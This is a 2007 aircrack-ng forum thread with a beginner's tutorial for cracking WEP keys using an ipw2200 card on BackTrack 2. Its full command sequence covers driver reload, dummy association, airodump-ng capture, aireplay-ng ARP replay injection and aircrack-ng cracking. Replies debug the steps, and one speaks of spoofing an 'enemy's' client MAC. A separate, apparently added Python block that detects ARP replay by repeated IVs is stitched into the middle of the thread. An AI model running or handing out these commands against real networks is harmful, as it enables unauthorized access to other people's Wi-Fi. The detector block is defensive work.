Aircrack-ng
Topic: Basic injection with ipw2200 and BackTrack v2 for beginners (Read 91168 times)
blinco (Guest)
« on: May 19, 2007, 05:37:41 pm »

Here's a quick guide for anyone trying to get injection working on an ipw2200 with BackTrack 2. This is intended for first-time aircrack-ng users, so it will only detail the most basic procedure. You can find more complicated guides with troubleshooting for some of the more complicated access points in other threads.

I will be demonstrating a simple WEP crack using ARP request replay. Please also read the newbie guide first so that you generally know what you are doing.

** This tutorial is for open authenticated networks only. Shared key authentication is more complicated. **

By the way: if you are very new to linux, selecting text in the terminal window (with the mouse) will automatically copy it, and clicking both mouse buttons at the same time will paste. You can stop any aircrack programs with ctrl+c. To see the history of the terminal window, you can scroll with shift+pageUp/pageDown.

BackTrack 2 supports ipw2200 injection out of the box, but there are some limitations. Injection is slightly more complex when using the ipw2200 as opposed to other cards - you have to use different interfaces to inject and monitor. You can only use the following aireplay-ng attacks with the ipw2200:
   2 (--interactive)
   3 (--arpreplay)
   4 (--chopchop)

You will need the following information first. You can find access point details using "iwlist eth1 scan" after you log into BackTrack:
   Access point bssid
   Access point channel

==================

0. (optional) The aircrack-ng team has done such a great job lately that there have been 2 releases since BackTrack 2. So the first thing that you should do is update aircrack-ng to v0.9. You should start backtrack connected to a LAN so that you can download the updates.
   wget http://download.aircrack-ng.org/aircrack-ng-0.9.tar.gz
   tar -zxvf aircrack-ng-0.9.tar.gz
   cd aircrack-ng-0.9
   make
   make install

1. Enable the rtap0 interface.
   rmmod ipw2200
   modprobe ipw2200 rtap_iface=1

2. Make a 'dummy' connection to the access point. You don't need to know the key at this stage - we just make up a fake one ("fakekey"). This step is required because of a limitation in the ipw2200 driver. ipw2200 must be in managed mode and connected to an access point before it will work with aireplay-ng.
   iwconfig eth1 ap <access point bssid>
   iwconfig eth1 key s:fakekey
   iwconfig eth1 mode managed

3. Bring up the interfaces:
   ifconfig eth1 up
   ifconfig rtap0 up

3a. Optional: at this point, you can type "iwconfig" to see if the dummy connection from step 2 has worked. The connection details will be listed beside the "eth1" interface.

4. Run airodump-ng to capture packets from your access point to dumpfile*.cap. You should always specify a channel with airodump, because otherwise it will try to scan through all channels, and that will break your injection attack.
   airodump-ng --channel <Access Point channel> --bssid <Access Point bssid> -w dumpfile rtap0

4a. After a few seconds in airodump-ng, you should notice that there are clients connected to the access point (they will be listed under "STATION"). Take note of the MAC address of one of the clients. You will use it in the next step.

5. Open another terminal window. Run an ARP replay attack. Note the commands at the end of the line ("-i rtap0 eth1") which tell aireplay-ng to listen on rtap0 and inject on eth1. After some time, an ARP packet will come through and the #/s figure in the airodump-ng window will increase. If the RXQ (receive quality %) column is >90 then you should be getting #/s of 200 or higher, but more importantly, it should be much higher than what it was before.
   aireplay-ng --arpreplay -b <Access Point bssid> -h <client MAC addr. from step 4a> -i rtap0 eth1

6. Wait a few minutes until the #Data reaches 100 000 (if you updated in step 0), or 1 000 000 (if you did not update in step 0). This should be more than enough, but we leave the attack running just in case.

7. Open another terminal window and run aircrack-ng.
  • If you did not update aircrack-ng in step 0, you will need 1 000 000 IVs, and will have to run aircrack-ng without -z:
       aircrack-ng -b <Access Point bssid> dumpfile*.cap
  • If you did update in step 0, you can use the PTW attack (-z option). Aircrack should say that it is processing approx. 100 000 IVs. If this number is low (less than 1000), there is some problem with your injection attack. Aircrack will then display "Key Found". You should know what to do after that.
       aircrack-ng -z -b <Access Point bssid> dumpfile*.cap

You should now have the key.

==================

Please let me know if there is anything that you think I should change about this tutorial to make it easier. Also, if anyone wants to take it further and publish it on the wiki, you are more than welcome to.


David.
« Last Edit: June 18, 2007, 01:58:22 am by David »
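The tutorial above describes the traffic pattern that ARP request replay produces on the air: one captured WEP data frame (the ARP request) is re-sent from a real client's MAC hundreds of times per second, which is why the #Data counter climbs. The following is an added example, not code from this thread or from the aircrack-ng project, showing how a defender can recognise that pattern from per-frame metadata: a WEP station normally uses a fresh 24-bit IV for every frame, so a burst of identical IVs from one source is a replay signature. The `Frame` record layout, the thresholds `window` and `min_repeats`, and the sample traffic are all constructed for this example; a real monitor would fill the records from a capture.

```python
"""Spot ARP-request replay against a WEP network from per-frame metadata.

Added example: not code from the forum thread or from aircrack-ng.
The attack described in the tutorial re-sends one captured WEP data frame
(the ARP request, ~68 bytes) from a real client's MAC at hundreds of frames
per second. Every copy carries the same 24-bit WEP IV, while normal traffic
from that client uses a fresh IV per frame, so a burst of identical IVs from
one source is the replay signature this detector looks for.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Frame:
    """Per-frame metadata a monitor would pull from a capture (assumed layout)."""
    ts: float     # seconds since capture start
    src: str      # transmitter (client) MAC
    bssid: str    # access point MAC
    length: int   # frame length in bytes
    iv: int       # 24-bit WEP IV from the data frame header


def replay_alerts(frames, window=1.0, min_repeats=20):
    """Return {(src, iv): peak_count} for every (source, IV) pair that is
    seen at least `min_repeats` times inside any `window`-second span.
    Thresholds are illustrative, not measured values."""
    by_key = defaultdict(list)
    for f in frames:
        by_key[(f.src, f.iv)].append(f.ts)
    alerts = {}
    for key, times in by_key.items():
        times.sort()
        lo, peak = 0, 0
        for hi, t in enumerate(times):  # sliding window over timestamps
            while t - times[lo] > window:
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak >= min_repeats:
            alerts[key] = peak
    return alerts


def iv_reuse_ratio(frames):
    """Fraction of frames whose (src, IV) pair was already seen earlier.
    Close to 0 for ordinary WEP traffic, jumps under replay."""
    seen, reused = set(), 0
    for f in frames:
        key = (f.src, f.iv)
        if key in seen:
            reused += 1
        seen.add(key)
    return reused / len(frames) if frames else 0.0


def sample_frames():
    """Constructed sample traffic (not a real capture).
    A client sends 50 frames with fresh IVs at 5 frames/s; frame 10 is a
    68-byte ARP request (IV 0x10000A, sent at t=2.0). That one frame is then
    replayed 100 times in 0.5 s, i.e. 200 frames/s, as the tutorial describes."""
    bssid, client = "00:11:22:33:44:55", "00:aa:bb:cc:dd:01"
    frames = [Frame(i * 0.2, client, bssid, 68 if i == 10 else 120 + i % 7,
                    0x100000 + i) for i in range(50)]
    frames += [Frame(3.0 + i * 0.005, client, bssid, 68, 0x10000A)
               for i in range(100)]
    return frames


if __name__ == "__main__":
    frames = sample_frames()
    print("IV reuse ratio: %.2f" % iv_reuse_ratio(frames))
    for (src, iv), n in replay_alerts(frames).items():
        print("replay suspected: %s repeated IV 0x%06x %d times" % (src, iv, n))
```

The signal is the repeated IV rather than the source address, so the check works whichever client MAC the replayed frame carries. It is also a reminder of why the IV counts in this thread matter at all: WEP has only 2^24 IVs and the key is recoverable once enough of them have been observed, so the real mitigation is moving the network off WEP, not tuning the threshold.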
pad (Guest)
« Reply #1 on: May 24, 2007, 01:48:21 pm »

Hiho,

good work. But one little thing was confusing me. Just tested your tutorial, and it works fine. But I think that you don't need the MAC of your OWN ipw2200 wifi card. I think you must use the MAC address of the enemy's wifi card, because when the MAC filter is enabled on the enemy's router, he wouldn't answer to the packets that you are sending. ^^ I am not a WLAN cracking noob; on the normal way I am using Ubuntu with aircrack 0.9 and a Netgear 511t wifi card. Just tested this tutorial because I have a Samsung laptop with an integrated ipw2200bg card.

Sorry for my bad English.
Kblair7 (Guest)
« Reply #2 on: May 26, 2007, 03:18:45 am »

Every time I attempt injection I get this error... any help would be great

thanks!



bt aircrack-ng # dir
AUTHORS          Makefile.OpenBSD  aircrack-ng*  airtun-ng*  packages/
ChangeLog        Makefile.cygwin   airdecap-ng*  evalrev*    packetforge-ng*
INSTALLING       Makefile.osx      aireplay-ng*  ivstools*   patches/
LICENSE          Makefile.other    airmon-ng     kstats*     src/
Makefile         README            airodump-ng*  makeivs*    test/
Makefile.NetBSD  VERSION           airoscript/   manpages/
bt aircrack-ng # patches
-bash: patches: command not found
bt aircrack-ng # patches/
-bash: patches/: is a directory
bt aircrack-ng # airmon-ng


Interface       Chipset         Driver

eth1            Centrino b/g    ipw2200

bt aircrack-ng # airmon-ng start eth1 monitor mode


Interface       Chipset         Driver

eth1            Centrino b/g    ipw2200 (monitor mode enabled)

bt aircrack-ng # clear
bt aircrack-ng # cd /root
bt ~ # cd /pentest/wireless/aircrack-ng
bt aircrack-ng # rmmod ipw2200
bt aircrack-ng # modprobe ipw rtap_iface= 2
FATAL: Error inserting ipw (/lib/modules/2.6.20-BT-PwnSauce-NOSMP/kernel/drivers/usb/serial/ipw.ko): Unknown symbol in module, or unknown parameter (see dmesg)
bt aircrack-ng # modprobe ipw rtap_iface= 1
FATAL: Error inserting ipw (/lib/modules/2.6.20-BT-PwnSauce-NOSMP/kernel/drivers/usb/serial/ipw.ko): Unknown symbol in module, or unknown parameter (see dmesg)
bt aircrack-ng #


blinco (Guest)
« Reply #3 on: May 26, 2007, 04:21:10 am »

@Pad:  Thanks for the feedback. I will update the original post with instructions for active clients.

@Kblair7: I think you have some trouble with this line: "modprobe ipw rtap_iface=1". I am not sure what module "ipw" is, but you should be using ipw2200 because that is what you removed. So, you should be entering this: "modprobe ipw2200 rtap_iface=1"
« Last Edit: May 26, 2007, 04:23:16 am by David »
kblair7 (Guest)
« Reply #4 on: May 26, 2007, 10:34:14 pm »

Thanks I will try, I am kind of new to linux command structure...I am used to dos tree so file-system is actually better but hard to get used to.

Thanks for the help I will continue to try
kblair7 (Guest)
« Reply #5 on: May 26, 2007, 11:16:40 pm »

Ok, I tried that but I am still getting a fatal error when I attempt the steps above.

bt aircrack-ng # clear
bt aircrack-ng # cd /root
bt ~ # cd /pentest/wireless/aircrack-ng
bt aircrack-ng # rmmod ipw2200
bt aircrack-ng # modprobe ipw2200 rtap_iface= 2
FATAL: Error inserting ipw2200(/lib/modules/2.6.20-BT-PwnSauce-NOSMP/kernel/drivers/usb/serial/ipw2200.ko): Unknown symbol in module, or unknown parameter (see dmesg)
bt aircrack-ng # modprobe ipw rtap_iface= 1
FATAL: Error inserting ipw2200 (/lib/modules/2.6.20-BT-PwnSauce-NOSMP/kernel/drivers/usb/serial/ipw2200.ko): Unknown symbol in module, or unknown parameter (see dmesg)
bt aircrack-ng #
blinco (Guest)
« Reply #6 on: May 27, 2007, 02:34:38 am »

Hi,

I think you still have some problems with these lines:
   modprobe ipw2200 rtap_iface= 2
   modprobe ipw rtap_iface= 1

You only need the second line, and it looks like you have a space between = and 1. It should be like this:
   modprobe ipw2200 rtap_iface=1

Also, you don't actually need these:
   cd /root
   cd /pentest/wireless/aircrack-ng
Aircrack-ng is in the path, so you don't need to be in that directory to run it. You can run it from anywhere.


See how you go with these commands.


David.
kblair7 (Guest)
« Reply #7 on: May 27, 2007, 04:15:16 am »

Thanks that worked..

However...my problem now is with

aircrack-ng -z -b <Access Point bssid> dumpfile*.cap

It doesn't allow option z
tells me it doesn't exist

oh well...

thanks for all the help!

-k
Mister_X (Administrator, Hero Member, Posts: 3159)
« Reply #8 on: May 27, 2007, 05:07:03 am »

It doesn't exist. This option was introduced in 0.9 and BackTrack contains a version in the middle of 0.7 and 0.8.
blinco (Guest)
« Reply #9 on: May 27, 2007, 09:09:24 am »

kblair7,

You can use aircrack-ng without -z, but then you will need 1 000 000 IVs instead of 100 000. The reason that you can't use the -z option is because you didn't do step 0 (update aircrack-ng suite to v0.9).

I have updated the tutorial now, so you have a choice if you want to update aircrack-ng to v0.9 or not.


David.
« Last Edit: May 27, 2007, 09:14:17 am by David »
Attacker87 (Full Member, Posts: 115)
« Reply #10 on: May 27, 2007, 05:21:17 pm »

This is a really good tutorial for ipw2200 cards. Good job.
willpower101 (Guest)
« Reply #11 on: May 27, 2007, 10:58:08 pm »

Could you explain a bit about how this interface is working and if it could be used to do a fakeauth or similar attack on an AP that wasn't showing any wireless clients? Is it making the card associate with its own ghost AP, similar to if you had an open router sitting near you to use?
blinco (Guest)
« Reply #12 on: May 27, 2007, 11:47:20 pm »

@Attacker87:
Thanks. I think it's important to have a good/simple ipw2200 tutorial because of the number of laptops with this card built in. It's probably the most common card out there if you think about all of the Centrino laptops that have been made over the last few years.
If you can think of any ways that I can make this tutorial easier, let me know. I am trying to keep it as easy as possible so that the newbies can follow the tutorial instead of asking us what the next step is.


@willpower101:
The ipw2200 will only work with interactive/arpreplay/chopchop attacks, so you can't use it to do fake authentication or deauthentication.
The reason that you have to associate to the access point in step 2 is because of a limitation in the ipw2200 driver: the ipw2200 can only inject when it is in managed mode, connected to an access point, and on the same channel as your target access point. You could put the card in managed mode and connect to any access point on the same channel. To keep the tutorial simple, I have used the same access point and a fake key - this will work every time, whereas finding another access point is a bit more complicated.
You have to use 2 interfaces also because of limitations in the ipw2200 driver.
« Last Edit: May 28, 2007, 12:09:35 am by David »
willpower101 (Guest)
« Reply #13 on: May 28, 2007, 04:53:11 am »

Can this be successfully used in conjunction with this guide, http://aircrack-ng.org/doku.php?id=how_to_crack_wep_with_no_clients, to capture and inject packets with the chopchop attack when there are no wireless clients on the network?

So far I modified several of the commands in that guide to -i etap0 eth0 and it seems to work.
I can capture a packet with chopchop and decode it with my WEP key.
After I inject with -2 -r arp-request, the data# climbs.

[edit] Seems to work fine. I realized I was decrypting the wrong cap file!
blinco (Guest)
« Reply #14 on: May 28, 2007, 05:19:42 am »

Yes, I think it will work if the authentication method of the AP is set to 'open' - step 2 actually authenticates with the AP, but any data that is sent/received would be scrambled because you have entered the wrong key. With shared authentication, it would probably not work because you need the key before you can authenticate with the AP.

The developers may be able to confirm if using the linux wireless tools is the same as using fake authentication against an open-authentication network.
Does anyone know if this:
   iwconfig ath0 bssid <ap bssid>
   iwconfig ath0 essid <ap essid>
   iwconfig ath0 key s:fakekey
will achieve the same result as this:
   aireplay-ng --fakeauth 0 -e <ap essid> -a <ap bssid> -h <ath0 mac address> ath0